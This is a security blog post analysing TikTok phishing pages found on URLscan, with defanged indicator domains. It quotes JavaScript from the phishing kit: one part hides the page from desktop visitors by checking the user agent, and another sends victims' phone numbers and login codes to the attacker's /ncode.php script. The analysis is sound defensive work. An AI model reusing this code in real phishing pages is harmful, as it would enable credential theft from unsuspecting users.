Taking a look at TikTok Phishing pages on URLscan

Published by Reza Rafati on

I was looking around at URLscan for some TikTok Phishing pages, and I noticed some phishing pages that are trying to lure Tiktok users. I want to share my findings with you, so that you safe some time and can do an quicker analysis.

Fake TikTok login form

The template used in the TikTok phishing attack is pretty simple. It utilizes an form which has 3 fields. The victim is supposed to select the phone country code and add their phone number. The security code of 4 digits is also requested.

Fake Login form trying to steal TikTok credentials

In the upper right corner of the TikTok phishing page, the cybercriminals have added hyperlinks that navigate to the official TikTok website.

Taking a look at the fake TikTok page sourcecode

The page itself is trying to hide itself from Desktop users. The page performs a checks to see if the visitor is using a mobile device.

It checks for:

  • Android
  • webOS
  • iPhone
  • iPad
  • iPod
  • BlackBerry
  • BB
  • PlayBook
  • IE Mobile
  • WindowsPhone
  • Kindle
  • Silk
  • Opera Mini
Mobile device check performed by UserAgent.
    const devices = new RegExp('Android|webOS|iPhone|iPad|iPod|BlackBerry|BB|PlayBook|IEMobile|Windows Phone|Kindle|Silk|Opera Mini', "i");
    if (devices.test(navigator.userAgent))

When we take a look at the code of the Fake TikTok form, we can quickly notice that the information is not being sent towards an official TikTok server. Instead it is being sent towards an fraudulent site.

The information is sent towards the path /ncode.php
                        function sendcode() {
                            getstatus = checknum(document.getElementById('numer').innerHTML.split(' ')[1], document.getElementById('inputlog').value)
                            if (getstatus){
                                var x = new XMLHttpRequest();
                                x.open('_GET', "#/ncode.php"+'?number='+document.getElementById('numer').innerHTML.split(' ')[1]+document.getElementById('inputlog').value+'&chatid='+[REMOVED]+'&status=getnumber')
                                document.getElementById("sendcode").className = "login-button-31D24 line-ErmhG disable-fEJEn highlight-1TvcX";
                                document.getElementById("sendcode").setAttribute('disabled', 'disable');

Find them on URLscan:

Additional IOC

  • account-tiktok[.]rf[.]gd
  • tiktok-monetization[.]ru
  • tiktok-ticket[.]ru
  • tiktok-support[.]ga
  • www[.]tiktok-support[.]ga
  • support[.]pp[.]ru
  • log-in-tiktok[.]com
  • tiktok-business[.]ru
  • www[.]tiktoksupport[.]live
  • tiktok-monetezation[.]ru
Share this information

Reza Rafati

Founder of Cyberwarzone.com.